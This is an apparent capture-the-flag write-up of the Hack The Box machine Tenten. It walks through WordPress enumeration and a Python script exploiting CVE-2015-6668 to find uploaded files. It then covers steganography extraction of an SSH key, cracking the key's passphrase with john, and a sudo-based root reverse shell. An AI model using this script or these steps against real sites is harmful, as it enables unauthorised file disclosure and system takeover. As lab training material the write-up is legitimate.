Hack The Box - Tenten

We are going to pwn Tenten from Hack The Box.

Link : https://www.hackthebox.eu/home/machines/profile/8

Like always begin with our Nmap Scan.

Nmap Scan Results:

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http


PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP


Since its a wordpress site we can enumerate using wpscan to get see if there is any users and plugins available
Found a Plugin called job-manager

Found an User takis

I started searching for any exploits available for that plugin and found

https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/

From the blog I found there is a directory /index.php/jobs/apply/@@/

As we can see there is an ID and when I changed to some random numbers and job title has been changed.

So I started trying some random number to check if there is anything useful for us.

Found this HackerAccessGranted from the ID 13 , Which looks suspecious.

In WordPress there is directory structure for the uploaded files is recognized by /wp-content/uploads/%year%/%month%/%filename%

There is a python script given in the above Link CVE-2015-6668 which helps to find the exact directory of the file location by bruteforcing.

I did some modifications on the script

  • Changed the year range to the year of the box released.
  • Changed the extensions.
import requests

print """  
CVE-2015-6668  
Title: CV filename disclosure on Job-Manager WP Plugin  
Author: Evangelos Mourikis  
Blog: https://vagmour.eu  
Plugin URL: http://www.wp-jobmanager.com  
Versions: <=0.7.25  
"""  
website = raw_input('Enter a vulnerable website: ')  
filename = raw_input('Enter a file name: ')

filename2 = filename.replace(" ", "-")

for year in range(2017,2018):  
    for i in range(1,13):
        for extension in {'jpg','jpeg','png','pdf','txt'}:
            URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
            req = requests.get(URL)
            if req.status_code==200:
                print "[+] URL of CV found! " + URL


It found the exact location of the file HackerAccessGranted

Opened the link and its an image.

This is the image we found!!

Downloaded it to my machine to check with steghide to see if there is anything hidden.

steghide - a steganography program

Got SSH Private key so lets use ssh2john before cracking it with john

I saved the output as ssh2john and I gave it to john to crack the password.

So the password is superpassword. We already know there is an user named takis

Privilege Escalation:

Like always I started with sudo -l

Looks like we can run fuckin as root without password.

fuckin seems to be a script that contains arguments and that we need to pass on.

Lets try with whoami

Now its time to get reverse shell as root using the fuckin

Started my listener

I got Root!